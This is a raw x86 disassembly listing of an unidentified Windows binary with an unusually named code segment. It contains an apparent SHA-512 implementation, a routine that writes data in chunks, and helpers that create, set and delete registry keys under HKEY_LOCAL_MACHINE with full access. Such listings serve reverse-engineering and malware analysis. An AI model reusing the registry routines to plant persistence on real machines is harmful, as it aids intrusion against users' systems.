shl ecx, 12h
shr ebp, 0Eh
or ecx, ebp
mov ebp, [esp+170h+var_150]
xor esi, ecx
mov ecx, [esp+170h+var_154]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_14C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_13C]
not edi
and edi, [esp+170h+var_148]
not ebx
and ebx, [esp+170h+var_144]
xor edi, ebp
xor ebx, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9B0[eax*8]
mov edi, [esp+170h+var_12C]
adc esi, ds:dword_41F9B4[eax*8]
add edx, [esp+170h+var_40]
mov eax, [esp+170h+var_140]
adc esi, [esp+170h+var_3C]
add eax, edx
adc ecx, esi
add [esp+170h+var_120], eax
mov esi, [esp+170h+var_130]
mov [esp+170h+var_140], eax
adc [esp+170h+var_11C], ecx
mov [esp+170h+var_13C], ecx
mov ecx, [esp+170h+var_138]
mov eax, esi
xor eax, ecx
mov [esp+170h+var_98], eax
mov eax, [esp+170h+var_134]
mov edx, edi
xor edx, eax
mov [esp+170h+var_94], edx
mov edx, esi
and edx, ecx
mov [esp+170h+var_90], edx
mov edx, edi
and edx, eax
mov [esp+170h+var_8C], edx
mov edx, ecx
xor esi, esi
shl edx, 4
mov edi, ecx
mov ebx, eax
shrd edi, ebx, 1Ch
shr ebx, 1Ch
or edx, ebx
or esi, edi
mov ebp, eax
shld ebp, ecx, 1Eh
xor ebx, ebx
shl ecx, 1Eh
or ebx, ebp
mov edi, eax
xor edx, ebx
mov ebx, [esp+170h+var_138]
shr edi, 2
or edi, ecx
mov ecx, eax
shld eax, ebx, 19h
xor esi, edi
shr ecx, 7
xor edi, edi
or edi, eax
mov eax, [esp+170h+var_98]
and eax, [esp+170h+var_128]
shl ebx, 19h
xor eax, [esp+170h+var_90]
or ecx, ebx
xor esi, ecx
mov ecx, [esp+170h+var_94]
and ecx, [esp+170h+var_124]
xor edx, edi
xor ecx, [esp+170h+var_8C]
add esi, eax
adc edx, ecx
add [esp+170h+var_140], esi
adc [esp+170h+var_13C], edx
cmp [esp+170h+var_15C], 0
jz loc_41643F
mov eax, [esp+170h+var_A0]
mov ecx, [esp+170h+var_9C]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_9C]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_F8]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_F4]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_F8]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_F4]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_D8]
adc edx, [esp+170h+var_D4]
add ecx, [esp+170h+var_C0]
adc edx, [esp+170h+var_BC]
mov [eax+0B8h], ecx
mov [eax+0BCh], edx
mov eax, edx
mov [esp+170h+var_C0], ecx
mov [esp+170h+var_BC], eax
mov [esp+170h+var_30], ecx
jmp short loc_416454
; ---------------------------------------------------------------------------
loc_41643F: ; CODE XREF: sub_4143D0+1F7E�j
mov edx, [esp+170h+var_C0]
mov eax, [esp+170h+var_BC]
mov [esp+170h+var_30], edx
loc_416454: ; CODE XREF: sub_4143D0+206D�j
mov ecx, [esp+170h+var_11C]
mov ebx, ecx
mov [esp+170h+var_2C], eax
mov eax, [esp+170h+var_120]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_11C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
shr ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_158]
xor esi, ecx
mov ecx, [esp+170h+var_11C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_154]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_148]
not ebx
and ebx, [esp+170h+var_14C]
not edi
and edi, [esp+170h+var_150]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9B8[eax*8]
adc esi, ds:dword_41F9BC[eax*8]
add edx, [esp+170h+var_30]
mov eax, [esp+170h+var_128]
adc esi, [esp+170h+var_2C]
add ecx, edx
mov edx, [esp+170h+var_144]
adc edx, esi
add eax, ecx
adc [esp+170h+var_124], edx
mov [esp+170h+var_148], ecx
mov ecx, [esp+170h+var_140]
mov [esp+170h+var_144], edx
mov edx, [esp+170h+var_13C]
mov ebx, ecx
mov ebp, edx
shrd ebx, ebp, 1Ch
xor edi, edi
or edi, ebx
mov esi, ecx
mov ebx, edx
shld edx, ecx, 1Eh
shr ebp, 1Ch
shl esi, 4
or esi, ebp
shr ebx, 2
shl ecx, 1Eh
xor ebp, ebp
or ebx, ecx
mov [esp+170h+var_128], eax
or ebp, edx
mov ecx, [esp+170h+var_13C]
xor esi, ebp
mov ebp, [esp+170h+var_140]
mov edx, ecx
shld ecx, ebp, 19h
xor edi, ebx
shr edx, 7
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_98]
and ecx, [esp+170h+var_140]
shl ebp, 19h
xor ecx, [esp+170h+var_90]
or edx, ebp
xor edi, edx
mov edx, [esp+170h+var_94]
and edx, [esp+170h+var_13C]
xor esi, ebx
xor edx, [esp+170h+var_8C]
add edi, ecx
adc esi, edx
add [esp+170h+var_148], edi
adc [esp+170h+var_144], esi
cmp [esp+170h+var_15C], 0
jz loc_4166A0
mov eax, [esp+170h+var_B0]
mov ecx, [esp+170h+var_AC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_AC]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_E0]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_DC]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_E0]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_DC]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor edi, eax
mov eax, [esp+170h+arg_0]
xor esi, ecx
mov ecx, [esp+170h+var_160]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_118]
adc edx, [esp+170h+var_114]
add ecx, [esp+170h+var_A0]
adc edx, [esp+170h+var_9C]
mov [eax+0C0h], ecx
mov [eax+0C4h], edx
mov eax, edx
mov [esp+170h+var_9C], eax
mov [esp+170h+var_1C], eax
mov eax, [esp+170h+var_128]
mov [esp+170h+var_A0], ecx
mov [esp+170h+var_20], ecx
jmp short loc_4166BC
; ---------------------------------------------------------------------------
loc_4166A0: ; CODE XREF: sub_4143D0+21CE�j
mov edx, [esp+170h+var_A0]
mov ecx, [esp+170h+var_9C]
mov [esp+170h+var_20], edx
mov [esp+170h+var_1C], ecx
loc_4166BC: ; CODE XREF: sub_4143D0+22CE�j
mov ecx, [esp+170h+var_124]
mov ebx, ecx
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_124]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_120]
xor esi, ecx
mov ecx, [esp+170h+var_124]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_11C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_14C]
not ebx
and ebx, [esp+170h+var_154]
not edi
and edi, [esp+170h+var_158]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9C0[eax*8]
adc esi, ds:dword_41F9C4[eax*8]
add edx, [esp+170h+var_20]
mov eax, [esp+170h+var_150]
adc esi, [esp+170h+var_1C]
add eax, edx
adc ecx, esi
add [esp+170h+var_130], eax
mov [esp+170h+var_14C], ecx
mov [esp+170h+var_150], eax
adc [esp+170h+var_12C], ecx
mov eax, [esp+170h+var_144]
mov ecx, [esp+170h+var_148]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_148]
mov ebp, eax
shld ebp, ebx, 19h
xor edx, edx
or edx, ebp
mov ebp, [esp+170h+var_13C]
xor ebp, [esp+170h+var_134]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_140]
xor edi, ecx
mov ecx, [esp+170h+var_138]
and ebp, eax
mov eax, [esp+170h+var_13C]
and eax, [esp+170h+var_134]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_148]
and edx, ecx
xor ebx, edx
xor ebp, eax
add edi, ebx
adc esi, ebp
add [esp+170h+var_150], edi
adc [esp+170h+var_14C], esi
cmp [esp+170h+var_15C], 0
jz loc_4168EA
mov eax, [esp+170h+var_C0]
mov ecx, [esp+170h+var_BC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_BC]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_100]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_FC]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_100]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_FC]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_C8]
adc edx, [esp+170h+var_C4]
add ecx, [esp+170h+var_E0]
adc edx, [esp+170h+var_DC]
mov [eax+0C8h], ecx
mov [eax+0CCh], edx
mov eax, edx
mov [esp+170h+var_E0], ecx
mov [esp+170h+var_DC], eax
mov [esp+170h+var_10], ecx
jmp short loc_4168FF
; ---------------------------------------------------------------------------
loc_4168EA: ; CODE XREF: sub_4143D0+2429�j
mov edx, [esp+170h+var_E0]
mov eax, [esp+170h+var_DC]
mov [esp+170h+var_10], edx
loc_4168FF: ; CODE XREF: sub_4143D0+2518�j
mov ecx, [esp+170h+var_12C]
mov ebx, ecx
mov [esp+170h+var_C], eax
mov eax, [esp+170h+var_130]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_12C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_128]
xor esi, ecx
mov ecx, [esp+170h+var_12C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_124]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_154]
not ebx
and ebx, [esp+170h+var_11C]
not edi
and edi, [esp+170h+var_120]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9C8[eax*8]
adc esi, ds:dword_41F9CC[eax*8]
add edx, [esp+170h+var_10]
mov eax, [esp+170h+var_158]
adc esi, [esp+170h+var_C]
add eax, edx
adc ecx, esi
add [esp+170h+var_138], eax
mov [esp+170h+var_154], ecx
mov [esp+170h+var_158], eax
adc [esp+170h+var_134], ecx
mov ecx, [esp+170h+var_150]
mov eax, [esp+170h+var_14C]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_150]
mov ebp, eax
shld ebp, ebx, 19h
shl ebx, 19h
xor edx, edx
or edx, ebp
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edi, ecx
mov ecx, [esp+170h+var_150]
xor esi, edx
mov edx, [esp+170h+var_140]
mov ebx, ecx
and ecx, edx
xor ebx, edx
and ebx, [esp+170h+var_148]
mov ebp, eax
xor ebp, [esp+170h+var_13C]
mov edx, ecx
and ebp, [esp+170h+var_144]
mov ecx, [esp+170h+var_13C]
and eax, ecx
xor ebx, edx
xor ebp, eax
add edi, ebx
adc esi, ebp
add [esp+170h+var_158], edi
mov edi, [esp+170h+var_15C]
adc [esp+170h+var_154], esi
add edi, 10h
cmp edi, 50h
mov [esp+170h+var_15C], edi
jb loc_414560
mov eax, [esp+170h+var_4]
mov edx, [esp+170h+var_158]
add [eax], edx
mov edx, [esp+170h+var_154]
pop edi
adc [eax+4], edx
mov eax, [esp+16Ch+arg_0]
mov edx, [esp+16Ch+var_150]
add [eax+18h], edx
mov edx, [esp+16Ch+var_14C]
pop esi
adc [eax+1Ch], edx
mov edx, [esp+168h+var_148]
add [eax+20h], edx
mov edx, [esp+168h+var_144]
pop ebp
adc [eax+24h], edx
mov edx, [esp+164h+var_140]
add [eax+28h], edx
mov edx, [esp+164h+var_134]
pop ebx
adc [eax+2Ch], ecx
mov ecx, [esp+160h+var_138]
add [eax+30h], ecx
mov ecx, [esp+160h+var_130]
adc [eax+34h], edx
add [eax+38h], ecx
mov edx, [esp+160h+var_12C]
mov ecx, [esp+160h+var_128]
adc [eax+3Ch], edx
add [eax+40h], ecx
mov edx, [esp+160h+var_124]
mov ecx, [esp+160h+var_120]
adc [eax+44h], edx
add [eax+48h], ecx
mov edx, [esp+160h+var_11C]
adc [eax+4Ch], edx
add esp, 160h
retn
sub_4143D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416AE0 proc near ; CODE XREF: .kSjx934:00416D62�p
; sub_41B7F9+CA�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
mov ecx, [ebx]
push ebp
and ecx, 7Fh
push esi
lea esi, [ecx+7]
shr esi, 3
push edi
mov [esp+10h+var_4], ecx
jz short loc_416B45
lea edx, [ebx+esi*8+50h]
loc_416AF9: ; CODE XREF: sub_416AE0+5F�j
mov eax, [edx-8]
mov ecx, [edx-4]
sub edx, 8
mov edi, eax
sub esi, 1
ror edi, 8
and edi, 0FF00FF00h
rol eax, 8
and eax, 0FF00FFh
or edi, eax
mov ebp, ecx
xor eax, eax
ror ebp, 8
and ebp, 0FF00FF00h
rol ecx, 8
and ecx, 0FF00FFh
or ebp, ecx
xor ecx, ecx
or eax, ebp
or edi, ecx
test esi, esi
mov [edx], eax
mov [edx+4], edi
jnz short loc_416AF9
mov ecx, [esp+10h+var_4]
loc_416B45: ; CODE XREF: sub_416AE0+13�j
mov eax, ecx
and eax, 7
add eax, eax
add eax, eax
mov esi, ds:dword_4249C0[eax+eax]
mov edi, ds:dword_4249C4[eax+eax]
add eax, eax
mov edx, ecx
shr edx, 3
and esi, [ebx+edx*8+50h]
and edi, [ebx+edx*8+54h]
or esi, ds:dword_424A00[eax]
or edi, ds:dword_424A04[eax]
cmp ecx, 6Fh
mov [ebx+edx*8+50h], esi
mov [ebx+edx*8+54h], edi
jbe short loc_416BAA
cmp ecx, 78h
jnb short loc_416B9D
mov dword ptr [ebx+0C8h], 0
mov dword ptr [ebx+0CCh], 0
loc_416B9D: ; CODE XREF: sub_416AE0+A7�j
push ebx
call sub_4143D0
add esp, 4
xor edx, edx
jmp short loc_416BB2
; ---------------------------------------------------------------------------
loc_416BAA: ; CODE XREF: sub_416AE0+A2�j
add edx, 1
cmp edx, 0Eh
jnb short loc_416BD8
loc_416BB2: ; CODE XREF: sub_416AE0+C8�j
mov ecx, 0Dh
sub ecx, edx
add ecx, ecx
add ecx, ecx
lea esi, [ebx+edx*8+50h]
add ecx, ecx
shr ecx, 2
lea edi, [esi+8]
mov dword ptr [esi], 0
mov dword ptr [esi+4], 0
rep movsd
loc_416BD8: ; CODE XREF: sub_416AE0+D0�j
mov edx, [ebx+8]
mov esi, [ebx+0Ch]
mov ecx, [ebx+4]
mov eax, [ebx]
shld esi, edx, 3
add edx, edx
mov edi, ecx
shld ecx, eax, 3
add edx, edx
add eax, eax
add edx, edx
add eax, eax
shr edi, 1Dh
xor ebp, ebp
or edx, edi
add eax, eax
or esi, ebp
push ebx
mov [ebx+0C0h], edx
mov [ebx+0C4h], esi
mov [ebx+0C8h], eax
mov [ebx+0CCh], ecx
call sub_4143D0
add esp, 4
xor esi, esi
loc_416C25: ; CODE XREF: sub_416AE0+171�j
mov ecx, esi
not ecx
and ecx, 7
mov edx, esi
shr edx, 3
mov eax, [ebx+edx*8+10h]
mov edx, [ebx+edx*8+14h]
add ecx, ecx
add ecx, ecx
add ecx, ecx
call sub_4118E0
mov ecx, [esp+10h+arg_0]
mov [esi+ecx], al
add esi, 1
cmp esi, 40h
jb short loc_416C25
pop edi
pop esi
pop ebp
pop ecx
retn
sub_416AE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416C60 proc near ; CODE XREF: sub_41B7F9+A3�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 0Ch
push ebx
mov ebx, [esp+10h+arg_4]
mov eax, [ebx]
push ebp
mov ebp, [esp+14h+arg_0]
push esi
push edi
and eax, 7Fh
mov edi, 80h
sub edi, eax
mov esi, ecx
xor ecx, ecx
add [ebx], ebp
adc [ebx+4], ecx
mov edx, [ebx+4]
cmp edx, ecx
ja short loc_416C9B
jb short loc_416C93
mov ecx, [ebx]
cmp ecx, ebp
jnb short loc_416C9B
loc_416C93: ; CODE XREF: sub_416C60+2B�j
add dword ptr [ebx+8], 1
adc dword ptr [ebx+0Ch], 0
loc_416C9B: ; CODE XREF: sub_416C60+29�j
; sub_416C60+31�j
cmp ebp, edi
jb loc_416D3F
loc_416CA3: ; CODE XREF: sub_416C60+D9�j
push edi
lea edx, [ebx+eax+50h]
push esi
push edx
call sub_407BF0
add esi, edi
add esp, 0Ch
sub ebp, edi
mov [esp+1Ch+var_4], esi
mov [esp+1Ch+arg_0], ebp
mov edi, 80h
mov [esp+1Ch+var_8], 0
mov esi, 10h
lea edx, [ebx+0D0h]
loc_416CD6: ; CODE XREF: sub_416C60+BC�j
mov eax, [edx-8]
mov ecx, [edx-4]
sub edx, 8
mov ebx, eax
sub esi, 1
ror ebx, 8
and ebx, 0FF00FF00h
rol eax, 8
and eax, 0FF00FFh
or ebx, eax
mov ebp, ecx
xor eax, eax
ror ebp, 8
and ebp, 0FF00FF00h
rol ecx, 8
and ecx, 0FF00FFh
or ebp, ecx
xor ecx, ecx
or eax, ebp
or ebx, ecx
test esi, esi
mov [edx], eax
mov [edx+4], ebx
jnz short loc_416CD6
mov ebx, [esp+1Ch+arg_4]
push ebx
call sub_4143D0
mov ebp, [esp+20h+arg_0]
mov eax, [esp+20h+var_8]
mov esi, [esp+20h+var_4]
add esp, 4
cmp ebp, edi
jnb loc_416CA3
loc_416D3F: ; CODE XREF: sub_416C60+3D�j
push ebp
lea edx, [eax+ebx+50h]
push esi
push edx
call sub_407BF0
add esp, 0Ch
pop edi
pop esi
pop ebp
pop ebx
add esp, 0Ch
retn
sub_416C60 endp
; ---------------------------------------------------------------------------
align 10h
push ecx
push eax
call sub_416AE0
add esp, 4
pop ecx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416D6C proc near ; CODE XREF: sub_416D6C+D5�p
; sub_41A9DE+67F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = word ptr 14h
arg_14 = dword ptr 1Ch
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = byte ptr 30h
arg_2B = byte ptr 33h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_28], 0
push ebx
push esi
push edi
jz short loc_416D85
mov ecx, [ebp+arg_4]
shr ecx, 18h
or cl, 1
jmp short loc_416D8B
; ---------------------------------------------------------------------------
loc_416D85: ; CODE XREF: sub_416D6C+C�j
mov cl, byte ptr [ebp+arg_4+3]
and cl, 0FEh
loc_416D8B: ; CODE XREF: sub_416D6C+17�j
movzx eax, word ptr [ebp+arg_24]
mov ebx, [ebp+arg_20]
lea edx, [ebx+18h]
cmp edx, eax
ja short loc_416DA8
lea edx, [ebx+18h]
mov [ebp+arg_14], ebx
or cl, 2
mov [ebp+arg_2B], 0
jmp short loc_416DB9
; ---------------------------------------------------------------------------
loc_416DA8: ; CODE XREF: sub_416D6C+2B�j
mov dx, word ptr [ebp+arg_24]
add eax, 0FFFFFFE8h
mov [ebp+arg_14], eax
and cl, 0FDh
mov [ebp+arg_2B], 1
loc_416DB9: ; CODE XREF: sub_416D6C+3A�j
movzx eax, dx
push eax
mov byte ptr [ebp+arg_4+3], cl
mov [ebp+arg_C], dx
mov [ebp+var_4], eax
call sub_4036E0
test eax, eax
pop ecx
mov [ebp+arg_20], eax
jz loc_416E58
push 6
pop ecx
mov edi, eax
lea esi, [ebp+arg_4]
rep movsd
mov edi, [ebp+arg_14]
mov esi, [ebp+arg_1C]
push edi
add eax, 18h
push esi
push eax
call sub_407BF0
add esp, 0Ch
push 0
lea eax, [ebp+var_8]
push eax
push [ebp+var_4]
push [ebp+arg_20]
push [ebp+arg_0]
call ds:dword_41D088
test eax, eax
jz short loc_416E4F
mov eax, [ebp+var_4]
cmp [ebp+var_8], eax
jnz short loc_416E4F
push [ebp+arg_20]
call sub_403603
cmp [ebp+arg_2B], 0
pop ecx
jz short loc_416E4B
push 0
push [ebp+arg_24]
sub ebx, edi
push ebx
add edi, esi
push edi
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_0]
lea esi, [ebp+arg_4]
rep movsd
call sub_416D6C
add esp, 2Ch
jmp short loc_416E5A
; ---------------------------------------------------------------------------
loc_416E4B: ; CODE XREF: sub_416D6C+B8�j
mov al, 1
jmp short loc_416E5A
; ---------------------------------------------------------------------------
loc_416E4F: ; CODE XREF: sub_416D6C+A1�j
; sub_416D6C+A9�j
push [ebp+arg_20]
call sub_403603
pop ecx
loc_416E58: ; CODE XREF: sub_416D6C+66�j
xor al, al
loc_416E5A: ; CODE XREF: sub_416D6C+DD�j
; sub_416D6C+E1�j
pop edi
pop esi
pop ebx
leave
retn
sub_416D6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416E5F proc near ; CODE XREF: sub_416F86+154�p
; sub_417119+152�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
xor ebx, ebx
push ebx
lea eax, [ebp+var_4]
push eax
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
push [ebp+arg_0]
push 80000002h
call ds:dword_41D004
test eax, eax
jz short loc_416E94
push [ebp+var_4]
call ds:dword_41D010
xor al, al
loc_416E91: ; CODE XREF: sub_416E5F+68�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_416E94: ; CODE XREF: sub_416E5F+25�j
mov eax, [ebp+arg_8]
push esi
lea esi, [eax+1]
loc_416E9B: ; CODE XREF: sub_416E5F+41�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_416E9B
sub eax, esi
push eax
push [ebp+arg_8]
push 1
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call ds:dword_41D00C
test eax, eax
pop esi
jz short loc_416EC9
loc_416EBC: ; CODE XREF: sub_416E5F+6C�j
push [ebp+var_4]
call ds:dword_41D010
mov al, bl
jmp short loc_416E91
; ---------------------------------------------------------------------------
loc_416EC9: ; CODE XREF: sub_416E5F+5B�j
mov bl, 1
jmp short loc_416EBC
sub_416E5F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416ECD proc near ; CODE XREF: sub_416F86+113�p
; sub_417119+100�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push 1
push 0
push [ebp+arg_4]
push 80000002h
call ds:dword_41D02C
test eax, eax
jnz short loc_416F15
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_C]
lea eax, [ebp+arg_0]
push eax
push 0
push [ebp+arg_8]
push [ebp+var_4]
call ds:dword_41D008
test eax, eax
jnz short loc_416F15
push [ebp+var_4]
call ds:dword_41D010
mov al, 1
leave
retn
; ---------------------------------------------------------------------------
loc_416F15: ; CODE XREF: sub_416ECD+1C�j
; sub_416ECD+39�j
push [ebp+var_4]
call ds:dword_41D010
push [ebp+arg_10]
push 0
push [ebp+arg_C]
call sub_407B70
add esp, 0Ch
xor al, al
leave
retn
sub_416ECD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416F32 proc near ; CODE XREF: sub_419477+134�p
; sub_419A9F+F2�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
xor ebx, ebx
push ebx
lea eax, [ebp+var_4]
push eax
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41D004
test eax, eax
jz short loc_416F65
push [ebp+var_4]
call ds:dword_41D010
xor al, al
loc_416F62: ; CODE XREF: sub_416F32+4E�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_416F65: ; CODE XREF: sub_416F32+23�j
push [ebp+arg_8]
push [ebp+var_4]
call ds:dword_41D000
test eax, eax
jz short loc_416F82
loc_416F75: ; CODE XREF: sub_416F32+52�j
push [ebp+var_4]
call ds:dword_41D010
mov al, bl
jmp short loc_416F62
; ---------------------------------------------------------------------------
loc_416F82: ; CODE XREF: sub_416F32+41�j
mov bl, 1
jmp short loc_416F75
sub_416F32 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=94h
sub_416F86 proc near ; CODE XREF: .kSjx934:loc_41BF0D�p
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-94h]
sub esp, 114h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+94h+var_4], eax
push ebx
push esi
push edi
mov edi, 100h
push edi
call sub_402648
mov esi, eax
push edi
mov [ebp+94h+var_110], esi
call sub_402648
push edi
mov [ebp+94h+var_108], eax
call sub_402648
push edi
mov [ebp+94h+var_114], eax
call sub_402648
